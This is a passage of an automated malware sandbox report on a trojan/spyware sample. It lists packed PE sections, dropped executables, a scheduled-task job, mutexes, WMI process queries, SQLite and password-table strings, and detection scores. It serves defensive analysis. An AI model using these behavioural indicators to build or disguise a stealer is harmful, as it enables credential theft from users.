memstr_86f4d0e5-3
Source: 88edf6a100.exe, 0000001D.00000000.3069044721.0000000000532000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_62051681-7
Source: 88edf6a100.exe, 0000001D.00000000.3069044721.0000000000532000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_fab78018-e
PE file contains section with special chars
Source: g4Cyr2T5jq.exe Static PE information: section name:
Source: g4Cyr2T5jq.exe Static PE information: section name: .idata
Source: g4Cyr2T5jq.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: f84005b97f.exe.6.dr Static PE information: section name:
Source: f84005b97f.exe.6.dr Static PE information: section name: .rsrc
Source: f84005b97f.exe.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 7e96f85771.exe.6.dr Static PE information: section name:
Source: 7e96f85771.exe.6.dr Static PE information: section name: .rsrc
Source: 7e96f85771.exe.6.dr Static PE information: section name: .idata
Source: 7e96f85771.exe.6.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C90B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 8_2_6C90B700
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C90B8C0 rand_s,NtQueryVirtualMemory, 8_2_6C90B8C0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C90B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 8_2_6C90B910
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 8_2_6C8AF280
Creates files inside the system directory
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E8E530 6_2_00E8E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E8E530 6_2_00E8E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC78BB 6_2_00EC78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC8860 6_2_00EC8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC7049 6_2_00EC7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E84DE0 6_2_00E84DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC31A8 6_2_00EC31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC2D10 6_2_00EC2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC779B 6_2_00EC779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00E84B30 6_2_00E84B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EB7F36 6_2_00EB7F36
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007E0228 7_2_007E0228
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_0080E8A0 7_2_0080E8A0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007DA850 7_2_007DA850
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007E2030 7_2_007E2030
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_0081A0D0 7_2_0081A0D0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007D5160 7_2_007D5160
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007DE1A0 7_2_007DE1A0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_00814A40 7_2_00814A40
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007DA300 7_2_007DA300
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007FC470 7_2_007FC470
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007FCCD0 7_2_007FCCD0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007D7CA4 7_2_007D7CA4
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007E049B 7_2_007E049B
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007E4487 7_2_007E4487
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007FFD10 7_2_007FFD10
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007EC5F0 7_2_007EC5F0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007D35B0 7_2_007D35B0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007D8590 7_2_007D8590
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007E6EBF 7_2_007E6EBF
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007DBEB0 7_2_007DBEB0
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: 7_2_007DAF10 7_2_007DAF10
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8A35A0 8_2_6C8A35A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B6C80 8_2_6C8B6C80
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9034A0 8_2_6C9034A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C90C4A0 8_2_6C90C4A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B64C0 8_2_6C8B64C0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8CD4D0 8_2_6C8CD4D0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8AD4E0 8_2_6C8AD4E0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E6CF0 8_2_6C8E6CF0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C91AC00 8_2_6C91AC00
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E5C10 8_2_6C8E5C10
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8F2C10 8_2_6C8F2C10
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C91542B 8_2_6C91542B
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B5440 8_2_6C8B5440
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C91545C 8_2_6C91545C
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E0DD0 8_2_6C8E0DD0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9085F0 8_2_6C9085F0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BFD00 8_2_6C8BFD00
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8CED10 8_2_6C8CED10
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8D0512 8_2_6C8D0512
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C90E680 8_2_6C90E680
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8C5E90 8_2_6C8C5E90
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C904EA0 8_2_6C904EA0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9176E3 8_2_6C9176E3
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8ABEF0 8_2_6C8ABEF0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BFEF0 8_2_6C8BFEF0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8F5600 8_2_6C8F5600
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E7E10 8_2_6C8E7E10
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C909E30 8_2_6C909E30
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8F2E4E 8_2_6C8F2E4E
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8C4640 8_2_6C8C4640
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8C9E50 8_2_6C8C9E50
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E3E50 8_2_6C8E3E50
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C916E63 8_2_6C916E63
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8AC670 8_2_6C8AC670
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8F77A0 8_2_6C8F77A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8ADFE0 8_2_6C8ADFE0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8D6FF0 8_2_6C8D6FF0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B9F00 8_2_6C8B9F00
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E7710 8_2_6C8E7710
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8D60A0 8_2_6C8D60A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9150C7 8_2_6C9150C7
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8CC0E0 8_2_6C8CC0E0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E58E0 8_2_6C8E58E0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8B7810 8_2_6C8B7810
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8EB820 8_2_6C8EB820
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8F4820 8_2_6C8F4820
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8C8850 8_2_6C8C8850
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8CD850 8_2_6C8CD850
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8EF070 8_2_6C8EF070
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C902990 8_2_6C902990
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E5190 8_2_6C8E5190
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8AC9A0 8_2_6C8AC9A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8DD9B0 8_2_6C8DD9B0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8CA940 8_2_6C8CA940
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C91B170 8_2_6C91B170
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BD960 8_2_6C8BD960
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8FB970 8_2_6C8FB970
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C91BA90 8_2_6C91BA90
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C912AB0 8_2_6C912AB0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8A22A0 8_2_6C8A22A0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8D4AA0 8_2_6C8D4AA0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BCAB0 8_2_6C8BCAB0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E8AC0 8_2_6C8E8AC0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8C1AF0 8_2_6C8C1AF0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8EE2F0 8_2_6C8EE2F0
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8E9A60 8_2_6C8E9A60
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8AF380 8_2_6C8AF380
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C9153C8 8_2_6C9153C8
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8ED320 8_2_6C8ED320
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8A5340 8_2_6C8A5340
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C8BC370 8_2_6C8BC370
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Code function: String function: 007ED300 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00E97A00 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: String function: 6C8E94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: String function: 6C8DCBE8 appears 134 times
Uses 32bit PE files
Source: g4Cyr2T5jq.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: g4Cyr2T5jq.exe Static PE information: Section: ZLIB complexity 0.9978818971389646
Source: g4Cyr2T5jq.exe Static PE information: Section: ordjlgkm ZLIB complexity 0.9944651967930029
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9978818971389646
Source: skotes.exe.0.dr Static PE information: Section: ordjlgkm ZLIB complexity 0.9944651967930029
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9995423370462047
Source: f84005b97f.exe.6.dr Static PE information: Section: ZLIB complexity 0.9995423370462047
Source: random[1].exe0.6.dr Static PE information: Section: ypqgsygb ZLIB complexity 0.9948929706531668
Source: 7e96f85771.exe.6.dr Static PE information: Section: ypqgsygb ZLIB complexity 0.9948929706531668
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp, 7e96f85771.exe, 00000008.00000003.2874827283.00000000051B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@68/46@76/12
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Code function: 8_2_6C907030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 8_2_6C907030
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 7e96f85771.exe, 00000008.00000003.3012697367.000000001D807000.00000004.00000020.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000003.2984665345.000000001D814000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 7e96f85771.exe, 00000008.00000002.3210049328.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3194324257.000000001D912000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: g4Cyr2T5jq.exe ReversingLabs: Detection: 55%
Source: g4Cyr2T5jq.exe Virustotal: Detection: 52%
Source: g4Cyr2T5jq.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 7e96f85771.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe File read: C:\Users\user\Desktop\g4Cyr2T5jq.exe Jump to behavior
